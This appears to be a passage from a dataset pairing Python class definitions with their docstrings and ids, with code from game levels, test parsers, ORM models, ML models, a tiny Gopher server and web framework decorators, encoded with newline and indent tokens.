class Level_01(Level): <NEW_LINE> <INDENT> def __init__(self, player): <NEW_LINE> <INDENT> numGen = random.randint(1,3) <NEW_LINE> Level.__init__(self, player) <NEW_LINE> self.level_limit = -1000 <NEW_LINE> self.background = pygame.image.load("factory.png").convert() <NEW_LINE> self.background.set_colorkey(WHITE) <NEW_LINE> if numGen == 1: <NEW_LINE> <INDENT> level = [ [50, 50, 2, 600, 450], [50, 50, 1, 700, 450], [300, 100, 4, 500, 500], [50, 50, 1, 450, 550] ] <NEW_LINE> self.levellist = level <NEW_LINE> <DEDENT> elif numGen == 2: <NEW_LINE> <INDENT> level = [[50, 50, 2, 250, 500], [50, 50, 1, 350, 500], [50, 50, 2, 150, 550], [50, 50, 1, 250, 550], [50, 50, 2, 300, 550], [50, 50, 3, 350, 550], [50, 50, 3, 450, 550] ] <NEW_LINE> self.levellist = level <NEW_LINE> <DEDENT> elif numGen == 3: <NEW_LINE> <INDENT> level = [ [50, 50, 2, 600, 450], [100, 300, 4, 650, 400], [50, 50, 1, 250, 550], [50, 50, 1, 350, 550], [50, 50, 1, 450, 550], [100, 300, 5, 500, 500] ] <NEW_LINE> self.levellist = level <NEW_LINE> <DEDENT> for platform in level: <NEW_LINE> <INDENT> block = Platform(platform[0], platform[1], platform[2]) <NEW_LINE> block.rect.x = platform[3] <NEW_LINE> block.rect.y = platform[4] <NEW_LINE> block.player = self.player <NEW_LINE> self.platform_list.add(block) <NEW_LINE> <DEDENT> <DEDENT> def returnlevel(self): <NEW_LINE> <INDENT> return self.levellist | Definition for level 1. | 625990877047854f46340f4f |
class RecentCounter: <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.times = [] <NEW_LINE> <DEDENT> def ping(self, t: int) -> int: <NEW_LINE> <INDENT> self.times.append(t) <NEW_LINE> recent_after = t - 3000 <NEW_LINE> recents = 0 <NEW_LINE> for i in range(len(self.times), 0, -1): <NEW_LINE> <INDENT> if self.times[i - 1] >= recent_after: <NEW_LINE> <INDENT> recents += 1 <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> break <NEW_LINE> <DEDENT> <DEDENT> return recents | My initial attempt worked, however it failed performance tests for a large number of pings. | 62599087ec188e330fdfa447 |
class MarionetteUnittestOutputParser(DesktopUnittestOutputParser): <NEW_LINE> <INDENT> bad_gecko_install = re.compile(r'Error installing gecko!') <NEW_LINE> def __init__(self, **kwargs): <NEW_LINE> <INDENT> self.install_gecko_failed = False <NEW_LINE> super(MarionetteUnittestOutputParser, self).__init__(**kwargs) <NEW_LINE> <DEDENT> def parse_single_line(self, line): <NEW_LINE> <INDENT> if self.bad_gecko_install.search(line): <NEW_LINE> <INDENT> self.install_gecko_failed = True <NEW_LINE> <DEDENT> super(MarionetteUnittestOutputParser, self).parse_single_line(line) | A class that extends DesktopUnittestOutputParser such that it can
catch failed gecko installation errors. | 625990873617ad0b5ee07ceb |
class TestItemGiftCertificate(unittest.TestCase): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def tearDown(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def testItemGiftCertificate(self): <NEW_LINE> <INDENT> pass | ItemGiftCertificate unit test stubs | 625990877b180e01f3e49e32 |
class GopherServer: <NEW_LINE> <INDENT> def run(self): <NEW_LINE> <INDENT> server_socket = socket.socket() <NEW_LINE> server_socket.bind(('', 70)) <NEW_LINE> server_socket.listen(5) <NEW_LINE> while True: <NEW_LINE> <INDENT> connection, address = server_socket.accept() <NEW_LINE> requested_selector = connection.recv(1024) <NEW_LINE> response = Menu() <NEW_LINE> response.append(MenuItem( MenuItemType.MESSAGE, "Welcome!")) <NEW_LINE> connection.send(response.__str__().encode("utf-8")) <NEW_LINE> connection.shutdown(socket.SHUT_RDWR) <NEW_LINE> connection.close() | Serves Gopher directories and files. | 62599087283ffb24f3cf543b |
class Business(db.Model): <NEW_LINE> <INDENT> __tablename__ = 'business' <NEW_LINE> id = db.Column( db.Integer, Sequence('bussiness_id_seq', start=1, increment=1), primary_key=True, nullable=False ) <NEW_LINE> name = db.Column( db.String(length=255), nullable=False, unique=True ) <NEW_LINE> domain = db.Column( db.String(), nullable=False ) <NEW_LINE> active = db.Column( db.Boolean(), default=True, server_default=text('true'), nullable=False ) <NEW_LINE> @property <NEW_LINE> def serialize(self): <NEW_LINE> <INDENT> return { 'business_id': self.id, 'business_name': self.name } <NEW_LINE> <DEDENT> def get_business(self): <NEW_LINE> <INDENT> return Business.query.with_entities(Business.id, Business.name). filter_by(active=True).all() <NEW_LINE> <DEDENT> def as_dict(self): <NEW_LINE> <INDENT> data = {} <NEW_LINE> for c in self.__table__.columns: <NEW_LINE> <INDENT> if c.name == 'active' and getattr(self, c.name) is True: <NEW_LINE> <INDENT> data[c.name] = str(1) <NEW_LINE> <DEDENT> elif c.name == 'active' and getattr(self, c.name) is False: <NEW_LINE> <INDENT> data[c.name] = str(0) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> data[c.name] = getattr(self, c.name) <NEW_LINE> <DEDENT> <DEDENT> return data <NEW_LINE> <DEDENT> def serialize_columns(self): <NEW_LINE> <INDENT> meta = [] <NEW_LINE> for c in self.__table__.columns: <NEW_LINE> <INDENT> if c.name != 'id' and c.name != 'active': <NEW_LINE> <INDENT> title = '' <NEW_LINE> if c.name == 'name': <NEW_LINE> <INDENT> title = 'Business name:' <NEW_LINE> <DEDENT> elif c.name == 'domain': <NEW_LINE> <INDENT> title = 'Domain:' <NEW_LINE> <DEDENT> meta.append({ 'field': c.name, 'title': c.name.capitalize(), 'sortable': True, 'editable': { 'type': 'text', 'title': title, 'ajaxOptions': { 'type': 'POST', 'success': 'function (data) { }', 'error': 'function (xhr, status, error) { var err = eval("(" + xhr.responseText + ")"); alert(err.Message); }'}, 'validate': 'function (value) { value = $.trim(value); if (!value) { return \'This field is required\'; } if (!/^\$/.test(value)) { return \'This field needs to start width $.\'} var data = $table.bootstrapTable(\'getData\'), index = $(this).parents(\'tr\').data(\'index\'); console.log(data[index]); return \'\';'}}) <NEW_LINE> <DEDENT> elif c.name == 'active': <NEW_LINE> <INDENT> meta.append({'field': c.name, 'title': c.name.capitalize(), 'sortable': True, 'editable': {'type': 'select', 'title': 'Active:', 'source': '[{value: "1", text: "Yes"}, {value: "0", text: "No"}]', 'ajaxOptions': { 'type': 'POST', 'success': 'function (data) { }', 'error': 'function (xhr, status, error) { var err = eval("(" + xhr.responseText + ")"); alert(err.Message); }'}}}) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> meta.append({'field': c.name, 'title': c.name.capitalize(), 'sortable': True}) <NEW_LINE> <DEDENT> <DEDENT> return meta | Business table | 62599087656771135c48adfe |
class Assign(stmt): <NEW_LINE> <INDENT> def init(self, targets, value): <NEW_LINE> <INDENT> assert_exprs(targets, 'targets') <NEW_LINE> assert_expr(value, 'value') <NEW_LINE> self.targets = targets <NEW_LINE> self.value = value | An assignment. Inherits stmt.
targets : a list of expr nodes
value : an expr node | 625990873617ad0b5ee07ced |
class TuningRunManager(tuningrunmain.TuningRunMain): <NEW_LINE> <INDENT> def __init__(self, measurement_interface, args, **kwargs): <NEW_LINE> <INDENT> super(TuningRunManager, self).__init__(measurement_interface, args, **kwargs) <NEW_LINE> self.init() <NEW_LINE> self.tuning_run.state = 'RUNNING' <NEW_LINE> self.commit(force=True) <NEW_LINE> self.search_driver.external_main_begin() <NEW_LINE> <DEDENT> def get_next_desired_result(self): <NEW_LINE> <INDENT> dr = self.measurement_driver.query_pending_desired_results().first() <NEW_LINE> if dr is None: <NEW_LINE> <INDENT> self.search_driver.external_main_generation() <NEW_LINE> dr = self.measurement_driver.query_pending_desired_results().first() <NEW_LINE> if dr is None: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> self.measurement_driver.claim_desired_result(dr) <NEW_LINE> dr.limit = self.measurement_driver.run_time_limit(dr) <NEW_LINE> return dr <NEW_LINE> <DEDENT> def get_desired_results(self): <NEW_LINE> <INDENT> drs = self.measurement_driver.query_pending_desired_results().all() <NEW_LINE> if len(drs) == 0: <NEW_LINE> <INDENT> self.search_driver.external_main_generation() <NEW_LINE> drs = self.measurement_driver.query_pending_desired_results().all() <NEW_LINE> if len(drs) == 0: <NEW_LINE> <INDENT> return [] <NEW_LINE> <DEDENT> <DEDENT> for dr in drs: <NEW_LINE> <INDENT> self.measurement_driver.claim_desired_result(dr) <NEW_LINE> dr.limit = self.measurement_driver.run_time_limit(dr) <NEW_LINE> <DEDENT> return drs <NEW_LINE> <DEDENT> def report_result(self, desired_result, result, result_input=None): <NEW_LINE> <INDENT> self.measurement_driver.report_result(desired_result, result, result_input) <NEW_LINE> <DEDENT> def get_best_configuration(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self.search_driver.best_result.configuration.data <NEW_LINE> <DEDENT> except AttributeError: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> def get_best_result(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self.search_driver.best_result <NEW_LINE> <DEDENT> except AttributeError: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> def finish(self): <NEW_LINE> <INDENT> self.search_driver.external_main_end() <NEW_LINE> self.measurement_interface.save_final_config( self.search_driver.best_result.configuration) <NEW_LINE> self.tuning_run.final_config = self.search_driver.best_result.configuration <NEW_LINE> self.tuning_run.state = 'COMPLETE' <NEW_LINE> self.tuning_run.end_date = datetime.now() <NEW_LINE> self.commit(force=True) <NEW_LINE> self.session.close() | This class manages a tuning run in a "slave" configuration, where main()
is controlled by an another program. | 62599087091ae356687067df |
class Tracker(object): <NEW_LINE> <INDENT> NOT_IMPLEMENTED_MSG = 'To be implemented in device-linked class' <NEW_LINE> def __init__(self): <NEW_LINE> <INDENT> self.__connected = False <NEW_LINE> <DEDENT> def connect(self): <NEW_LINE> <INDENT> raise NotImplementedError(Tracker.NOT_IMPLEMENTED_MSG) <NEW_LINE> <DEDENT> def disconnect(self): <NEW_LINE> <INDENT> raise NotImplementedError(Tracker.NOT_IMPLEMENTED_MSG) <NEW_LINE> <DEDENT> @property <NEW_LINE> def connected(self): <NEW_LINE> <INDENT> return self.__connected <NEW_LINE> <DEDENT> @connected.setter <NEW_LINE> def connected(self, connected): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def capture(self, tool_id): <NEW_LINE> <INDENT> raise NotImplementedError(Tracker.NOT_IMPLEMENTED_MSG) | This class is an abstraction for all supported trackers. | 62599087283ffb24f3cf543e |
class DjangoModelDereferenceMixin(object): <NEW_LINE> <INDENT> def __get__(self, instance, owner): <NEW_LINE> <INDENT> if instance is None: <NEW_LINE> <INDENT> return self <NEW_LINE> <DEDENT> dereference = DjangoModelDereference() <NEW_LINE> if instance._initialised and instance._data.get(self.name): <NEW_LINE> <INDENT> instance._data[self.name] = dereference( instance._data.get(self.name), max_depth=1, instance=instance, name=self.name ) <NEW_LINE> <DEDENT> value = super(DjangoModelDereferenceMixin, self).__get__(instance, owner) <NEW_LINE> return self.to_python(value) | Mixin class which overrides __get__ behaviour for ModelFields
so it returns Model instances if possible. | 62599087656771135c48adff |
class CoordinationDriverCachedRunWatchers(CoordinationDriver): <NEW_LINE> <INDENT> def __init__(self, member_id, parsed_url, options): <NEW_LINE> <INDENT> super(CoordinationDriverCachedRunWatchers, self).__init__( member_id, parsed_url, options) <NEW_LINE> self._group_members = collections.defaultdict(set) <NEW_LINE> self._joined_groups = set() <NEW_LINE> <DEDENT> def _init_watch_group(self, group_id): <NEW_LINE> <INDENT> if group_id not in self._group_members: <NEW_LINE> <INDENT> members = self.get_members(group_id) <NEW_LINE> self._group_members[group_id] = members.get() <NEW_LINE> <DEDENT> <DEDENT> def watch_join_group(self, group_id, callback): <NEW_LINE> <INDENT> self._init_watch_group(group_id) <NEW_LINE> super(CoordinationDriverCachedRunWatchers, self).watch_join_group( group_id, callback) <NEW_LINE> <DEDENT> def unwatch_join_group(self, group_id, callback): <NEW_LINE> <INDENT> super(CoordinationDriverCachedRunWatchers, self).unwatch_join_group( group_id, callback) <NEW_LINE> if (not self._has_hooks_for_group(group_id) and group_id in self._group_members): <NEW_LINE> <INDENT> del self._group_members[group_id] <NEW_LINE> <DEDENT> <DEDENT> def watch_leave_group(self, group_id, callback): <NEW_LINE> <INDENT> self._init_watch_group(group_id) <NEW_LINE> super(CoordinationDriverCachedRunWatchers, self).watch_leave_group( group_id, callback) <NEW_LINE> <DEDENT> def unwatch_leave_group(self, group_id, callback): <NEW_LINE> <INDENT> super(CoordinationDriverCachedRunWatchers, self).unwatch_leave_group( group_id, callback) <NEW_LINE> if (not self._has_hooks_for_group(group_id) and group_id in self._group_members): <NEW_LINE> <INDENT> del self._group_members[group_id] <NEW_LINE> <DEDENT> <DEDENT> def run_watchers(self, timeout=None): <NEW_LINE> <INDENT> with timeutils.StopWatch(duration=timeout) as w: <NEW_LINE> <INDENT> result = [] <NEW_LINE> group_with_hooks = set(self._hooks_join_group.keys()).union( set(self._hooks_leave_group.keys())) <NEW_LINE> for group_id in group_with_hooks: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> group_members = self.get_members(group_id).get( timeout=w.leftover(return_none=True)) <NEW_LINE> <DEDENT> except GroupNotCreated: <NEW_LINE> <INDENT> group_members = set() <NEW_LINE> <DEDENT> if (group_id in self._joined_groups and self._member_id not in group_members): <NEW_LINE> <INDENT> self._joined_groups.discard(group_id) <NEW_LINE> <DEDENT> old_group_members = self._group_members.get(group_id, set()) <NEW_LINE> for member_id in (group_members - old_group_members): <NEW_LINE> <INDENT> result.extend( self._hooks_join_group[group_id].run( MemberJoinedGroup(group_id, member_id))) <NEW_LINE> <DEDENT> for member_id in (old_group_members - group_members): <NEW_LINE> <INDENT> result.extend( self._hooks_leave_group[group_id].run( MemberLeftGroup(group_id, member_id))) <NEW_LINE> <DEDENT> self._group_members[group_id] = group_members <NEW_LINE> <DEDENT> return result | Coordination driver with a `run_watchers` implementation.
This implementation of `run_watchers` is based on a cache of the group
members between each run of `run_watchers` that is being updated between
each run. | 625990877047854f46340f53 |
class ResNetCifar10(model_base.ResNet): <NEW_LINE> <INDENT> def __init__(self, num_layers, is_training, batch_norm_decay, batch_norm_epsilon, data_format='channels_first'): <NEW_LINE> <INDENT> super(ResNetCifar10, self).__init__( is_training, data_format, batch_norm_decay, batch_norm_epsilon ) <NEW_LINE> self.n = (num_layers - 2) // 6 <NEW_LINE> self.num_classes = 10 + 1 <NEW_LINE> self.filters = [16, 16, 32, 64] <NEW_LINE> self.strides = [1, 2, 2] <NEW_LINE> <DEDENT> def forward_pass(self, x, input_data_format='channels_last'): <NEW_LINE> <INDENT> if self._data_format != input_data_format: <NEW_LINE> <INDENT> if input_data_format == 'channels_last': <NEW_LINE> <INDENT> x = tf.transpose(x, [0, 3, 1, 2]) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> x = tf.transpose(x, [0, 2, 3, 1]) <NEW_LINE> <DEDENT> <DEDENT> x = x / 128 - 1 <NEW_LINE> x = self._conv(x, 3, 16, 1) <NEW_LINE> x = self._batch_norm(x) <NEW_LINE> x = self._relu(x) <NEW_LINE> res_func = self._residual_v1 <NEW_LINE> for i in range(3): <NEW_LINE> <INDENT> with tf.name_scope('stage'): <NEW_LINE> <INDENT> for j in range(self.n): <NEW_LINE> <INDENT> if j == 0: <NEW_LINE> <INDENT> x = res_func(x, 3, self.filters[i], self.filters[i + 1], self.strides[i]) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> x = res_func(x, 3, self.filters[i + 1], self.filters[i + 1], 1) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> <DEDENT> x = self._global_avg_pool(x) <NEW_LINE> x = self._fully_connected_with_activation(x, self.num_classes) <NEW_LINE> return x | Cifar10 model with ResNetV1 and basic residual block. | 625990875fdd1c0f98e5fb18 |
class RData( Binary ): <NEW_LINE> <INDENT> file_ext = 'rdata' <NEW_LINE> def sniff( self, filename ): <NEW_LINE> <INDENT> rdata_header = b'RDX2\nX\n' <NEW_LINE> try: <NEW_LINE> <INDENT> header = open(filename, 'rb').read(7) <NEW_LINE> if header == rdata_header: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> header = gzip.open( filename ).read(7) <NEW_LINE> if header == rdata_header: <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> <DEDENT> except: <NEW_LINE> <INDENT> return False | Generic R Data file datatype implementation | 6259908771ff763f4b5e934c |
class FunctionCache: <NEW_LINE> <INDENT> __slots__ = [ "_primary", "_dispatch_table", "_garbage_collectors" ] <NEW_LINE> def __init__(self): <NEW_LINE> <INDENT> self._primary = collections.OrderedDict() <NEW_LINE> self._dispatch_table = type_dispatch.TypeDispatchTable() <NEW_LINE> self._garbage_collectors = [ _FunctionGarbageCollector(self._primary), ] <NEW_LINE> <DEDENT> def lookup(self, key: FunctionCacheKey, use_function_subtyping: bool): <NEW_LINE> <INDENT> if not use_function_subtyping: <NEW_LINE> <INDENT> return self._primary.get(key, None) <NEW_LINE> <DEDENT> dispatch_key = self._dispatch_table.dispatch(key) <NEW_LINE> if dispatch_key is not None: <NEW_LINE> <INDENT> return self._primary[dispatch_key] <NEW_LINE> <DEDENT> return None <NEW_LINE> <DEDENT> def delete(self, key: FunctionCacheKey): <NEW_LINE> <INDENT> if key not in self._primary: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> del self._primary[key] <NEW_LINE> self._dispatch_table.delete(key) <NEW_LINE> return True <NEW_LINE> <DEDENT> def add(self, key: FunctionCacheKey, deletion_observer: trace_type.WeakrefDeletionObserver, concrete): <NEW_LINE> <INDENT> self._primary[key] = concrete <NEW_LINE> self._dispatch_table.add_target(key) <NEW_LINE> deletion_observer.add_listener( lambda: self.delete(key) if DELETE_WITH_WEAKREF else None) <NEW_LINE> <DEDENT> def generalize(self, key: FunctionCacheKey) -> FunctionCacheKey: <NEW_LINE> <INDENT> return self._dispatch_table.try_generalizing_trace_type(key) <NEW_LINE> <DEDENT> def clear(self): <NEW_LINE> <INDENT> self._primary.clear() <NEW_LINE> self._dispatch_table.clear() <NEW_LINE> <DEDENT> def values(self): <NEW_LINE> <INDENT> return list(self._primary.values()) | A container for managing concrete functions. | 6259908723849d37ff852c59 |
@INDEX.doc_type <NEW_LINE> class ExerciseDocument(Document): <NEW_LINE> <INDENT> id = fields.IntegerField(attr='id') <NEW_LINE> exercise_title = fields.TextField( attr='exercise_title', analyzer=html_strip, fields={ 'raw': fields.TextField(analyzer='keyword', multi=True), 'suggest': fields.CompletionField(multi=True), }, ) <NEW_LINE> muscle_group_title = fields.TextField( attr='muscle_group_indexing', analyzer=html_strip, fields={ 'raw': fields.TextField(analyzer='keyword', multi=True), 'suggest': fields.CompletionField(multi=True), }, multi=True, ) <NEW_LINE> class Django(object): <NEW_LINE> <INDENT> model = Exercise | Book Elasticsearch document. | 62599087f9cc0f698b1c609b |
class Command(BaseCommand): <NEW_LINE> <INDENT> help = 'This command imports fixed spellings for lexemes in the database.' 'The format that is expected "lang;correct_spelling;POS;ID;misspelled_word;POS"' <NEW_LINE> def add_arguments(self, parser): <NEW_LINE> <INDENT> parser.add_argument('-f', '--file', type=str, help='The CSV file to import.', ) <NEW_LINE> parser.add_argument('-d', '--delimiter', type=str, nargs='?', default=';', help='The delimiter to use when reading the CSV file.', ) <NEW_LINE> <DEDENT> def handle(self, *args, **options): <NEW_LINE> <INDENT> file_path = options['file'] <NEW_LINE> d = options['delimiter'] <NEW_LINE> if not os.path.isfile(file_path): <NEW_LINE> <INDENT> raise CommandError('File "%s" does not exist.' % file_path) <NEW_LINE> <DEDENT> with io.open(file_path, 'r', encoding='utf-8') as fp: <NEW_LINE> <INDENT> reader = csv.reader(fp, delimiter=d) <NEW_LINE> rows = list(reader) <NEW_LINE> rows = [r for r in rows if len(r) > 0] <NEW_LINE> for r in rows: <NEW_LINE> <INDENT> process(r) <NEW_LINE> <DEDENT> <DEDENT> self.stdout.write(self.style.SUCCESS('Successfully processed the file "%s"' % (file_path,))) | Example: python manage.py fix_spellings -f ../data/Adj-workspace_2020-05-19b.csv -d ';' | 62599087e1aae11d1e7cf5e3 |
class Autoshare(Entity): <NEW_LINE> <INDENT> __entityName__ = "security-policy" <NEW_LINE> __isLegacy__ = True <NEW_LINE> def edit( self, experiment_sharing=UNSPECIFIED, protocol_sharing=UNSPECIFIED, resource_sharing=UNSPECIFIED, extraParams={}, ): <NEW_LINE> <INDENT> from labstep.generic.entity.repository import editEntity <NEW_LINE> options = {True: "edit", False: "none", UNSPECIFIED: UNSPECIFIED} <NEW_LINE> fields = { "experiment_workflow": options[experiment_sharing], "protocol_collection": options[protocol_sharing], "resource": options[resource_sharing], **extraParams, } <NEW_LINE> return editEntity(self, fields=fields) | Represents an Autosharing rule on Labstep. | 625990878a349b6b43687dfe |
class matchesPattern(Validator): <NEW_LINE> <INDENT> def __init__(self, pattern): <NEW_LINE> <INDENT> self._pattern = re.compile(pattern) <NEW_LINE> <DEDENT> def test(self,x): <NEW_LINE> <INDENT> x = str(x) <NEW_LINE> print('testing %s against %s' % (x, self._pattern)) <NEW_LINE> return (self._pattern.match(x) != None) | Matches value, or its string representation, against regex | 625990874a966d76dd5f0a86 |
class AmuletDeployment(object): <NEW_LINE> <INDENT> def __init__(self, series=None): <NEW_LINE> <INDENT> self.series = None <NEW_LINE> if series: <NEW_LINE> <INDENT> self.series = series <NEW_LINE> self.d = amulet.Deployment(series=self.series) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.d = amulet.Deployment() <NEW_LINE> <DEDENT> <DEDENT> def _add_services(self, this_service, other_services): <NEW_LINE> <INDENT> name, units = range(2) <NEW_LINE> if this_service[name] != os.path.basename(os.getcwd()): <NEW_LINE> <INDENT> s = this_service[name] <NEW_LINE> msg = "The charm's root directory name needs to be {}".format(s) <NEW_LINE> amulet.raise_status(amulet.FAIL, msg=msg) <NEW_LINE> <DEDENT> self.d.add(this_service[name], units=this_service[units]) <NEW_LINE> for svc in other_services: <NEW_LINE> <INDENT> if self.series: <NEW_LINE> <INDENT> self.d.add(svc[name], charm='cs:{}/{}'.format(self.series, svc[name]), units=svc[units]) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.d.add(svc[name], units=svc[units]) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def _add_relations(self, relations): <NEW_LINE> <INDENT> for k, v in relations.iteritems(): <NEW_LINE> <INDENT> self.d.relate(k, v) <NEW_LINE> <DEDENT> <DEDENT> def _configure_services(self, configs): <NEW_LINE> <INDENT> for service, config in configs.iteritems(): <NEW_LINE> <INDENT> self.d.configure(service, config) <NEW_LINE> <DEDENT> <DEDENT> def _deploy(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> self.d.setup() <NEW_LINE> self.d.sentry.wait(timeout=900) <NEW_LINE> <DEDENT> except amulet.helpers.TimeoutError: <NEW_LINE> <INDENT> amulet.raise_status(amulet.FAIL, msg="Deployment timed out") <NEW_LINE> <DEDENT> except Exception: <NEW_LINE> <INDENT> raise <NEW_LINE> <DEDENT> <DEDENT> def run_tests(self): <NEW_LINE> <INDENT> for test in dir(self): <NEW_LINE> <INDENT> if test.startswith('test_'): <NEW_LINE> <INDENT> getattr(self, test)() | Amulet deployment.
This class provides generic Amulet deployment and test runner
methods. | 6259908755399d3f056280b5 |
class RconPacketException(Exception): <NEW_LINE> <INDENT> pass | Rcon Packet Exception | 62599087a05bb46b3848bef7 |
class itkDicomImageIO(itkGDCMImageIO): <NEW_LINE> <INDENT> thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') <NEW_LINE> def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined") <NEW_LINE> __repr__ = _swig_repr <NEW_LINE> def __New_orig__(): <NEW_LINE> <INDENT> return _ITKIOBasePython.itkDicomImageIO___New_orig__() <NEW_LINE> <DEDENT> __New_orig__ = staticmethod(__New_orig__) <NEW_LINE> __swig_destroy__ = _ITKIOBasePython.delete_itkDicomImageIO <NEW_LINE> def cast(*args): <NEW_LINE> <INDENT> return _ITKIOBasePython.itkDicomImageIO_cast(*args) <NEW_LINE> <DEDENT> cast = staticmethod(cast) <NEW_LINE> def GetPointer(self): <NEW_LINE> <INDENT> return _ITKIOBasePython.itkDicomImageIO_GetPointer(self) <NEW_LINE> <DEDENT> def New(*args, **kargs): <NEW_LINE> <INDENT> obj = itkDicomImageIO.__New_orig__() <NEW_LINE> import itkTemplate <NEW_LINE> itkTemplate.New(obj, *args, **kargs) <NEW_LINE> return obj <NEW_LINE> <DEDENT> New = staticmethod(New) | Proxy of C++ itkDicomImageIO class | 62599087283ffb24f3cf5441 |
class ProgramGroupBonus(Model): <NEW_LINE> <INDENT> COLUMNS = { "id": ColumnInteger(autoincrement=True, primary_key=True), "amount_minutes": ColumnInteger(null=False), "created": ColumnDatetime(null=False), "creator": ColumnText(null=False), "effective_date": ColumnDate(null=False), "message": ColumnText(null=False), "program_group": ColumnForeignKey(ProgramGroup), } | Bonus time for a program group. | 625990874527f215b58eb770 |
class SkillProxy(EveItemWrapper): <NEW_LINE> <INDENT> def __init__(self, type_id, level): <NEW_LINE> <INDENT> EveItemWrapper.__init__(self, type_id) <NEW_LINE> self.__parent_char_proxy = None <NEW_LINE> self.__eos_skill = EosSkill(type_id, level=level) <NEW_LINE> <DEDENT> @property <NEW_LINE> def _source(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self._parent_char_proxy._parent_fit.source <NEW_LINE> <DEDENT> except AttributeError: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> @property <NEW_LINE> def _eos_item(self): <NEW_LINE> <INDENT> return self.__eos_skill <NEW_LINE> <DEDENT> @property <NEW_LINE> def level(self): <NEW_LINE> <INDENT> return self.__eos_skill.level <NEW_LINE> <DEDENT> def _set_level(self, new_level): <NEW_LINE> <INDENT> self.__eos_skill.level = new_level <NEW_LINE> <DEDENT> @property <NEW_LINE> def _parent_char_proxy(self): <NEW_LINE> <INDENT> return self.__parent_char_proxy <NEW_LINE> <DEDENT> @_parent_char_proxy.setter <NEW_LINE> def _parent_char_proxy(self, new_char_proxy): <NEW_LINE> <INDENT> old_char_proxy = self._parent_char_proxy <NEW_LINE> old_fit = getattr(old_char_proxy, '_parent_fit', None) <NEW_LINE> new_fit = getattr(new_char_proxy, '_parent_fit', None) <NEW_LINE> self._unregister_on_fit(old_fit) <NEW_LINE> self.__parent_char_proxy = new_char_proxy <NEW_LINE> self._register_on_fit(new_fit) <NEW_LINE> self._update_source() <NEW_LINE> <DEDENT> def _register_on_fit(self, fit): <NEW_LINE> <INDENT> if fit is not None: <NEW_LINE> <INDENT> fit._eos_fit.skills.add(self.__eos_skill) <NEW_LINE> <DEDENT> <DEDENT> def _unregister_on_fit(self, fit): <NEW_LINE> <INDENT> if fit is not None: <NEW_LINE> <INDENT> fit._eos_fit.skills.remove(self.__eos_skill) <NEW_LINE> <DEDENT> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> spec = ['eve_id', 'level'] <NEW_LINE> return make_repr_str(self, spec) | Pyfa model: character_proxy.RestrictedSet(skills)
Eos model: efit.RestrictedSet(skills)
DB model: none (SkillCore handles it) | 625990875fc7496912d4903b |
class TermsAndAgreements(BrowserView): <NEW_LINE> <INDENT> pass | Terms-and-agreements View
| 62599087091ae356687067e3 |
class RNN(vae_module.VAECore): <NEW_LINE> <INDENT> def __init__(self, hparams, obs_encoder, obs_decoder, name=None): <NEW_LINE> <INDENT> super(RNN, self).__init__(hparams, obs_encoder, obs_decoder, name) <NEW_LINE> with self._enter_variable_scope(): <NEW_LINE> <INDENT> self._d_core = util.make_rnn(hparams, name="d_core") <NEW_LINE> <DEDENT> <DEDENT> @property <NEW_LINE> def state_size(self): <NEW_LINE> <INDENT> return self._d_core.state_size <NEW_LINE> <DEDENT> def _next_state(self, d_state, event=None): <NEW_LINE> <INDENT> del event <NEW_LINE> return d_state <NEW_LINE> <DEDENT> def _initial_state(self, batch_size): <NEW_LINE> <INDENT> return self._d_core.initial_state(batch_size) <NEW_LINE> <DEDENT> def _build(self, input_, d_state): <NEW_LINE> <INDENT> d_out, d_state = self._d_core(util.concat_features(input_), d_state) <NEW_LINE> return self._obs_decoder(d_out), d_state <NEW_LINE> <DEDENT> def _infer_latents(self, inputs, observed): <NEW_LINE> <INDENT> del inputs <NEW_LINE> batch_size = util.batch_size_from_nested_tensors(observed) <NEW_LINE> sequence_size = util.sequence_size_from_nested_tensors(observed) <NEW_LINE> divs = tf.zeros([batch_size, sequence_size], name="divergences") <NEW_LINE> return None, divs | Implementation of an RNN as a sequential VAE where all latent
variables are deterministic. | 62599087f9cc0f698b1c609c |
class view_config(object): <NEW_LINE> <INDENT> venusian = venusian <NEW_LINE> def __init__(self, name='', request_type=None, for_=None, permission=None, route_name=None, request_method=None, request_param=None, containment=None, attr=None, renderer=None, wrapper=None, xhr=False, accept=None, header=None, path_info=None, custom_predicates=(), context=None, decorator=None, mapper=None): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> self.request_type = request_type <NEW_LINE> self.context = context or for_ <NEW_LINE> self.permission = permission <NEW_LINE> self.route_name = route_name <NEW_LINE> self.request_method = request_method <NEW_LINE> self.request_param = request_param <NEW_LINE> self.containment = containment <NEW_LINE> self.attr = attr <NEW_LINE> self.renderer = renderer <NEW_LINE> self.wrapper = wrapper <NEW_LINE> self.xhr = xhr <NEW_LINE> self.accept = accept <NEW_LINE> self.header = header <NEW_LINE> self.path_info = path_info <NEW_LINE> 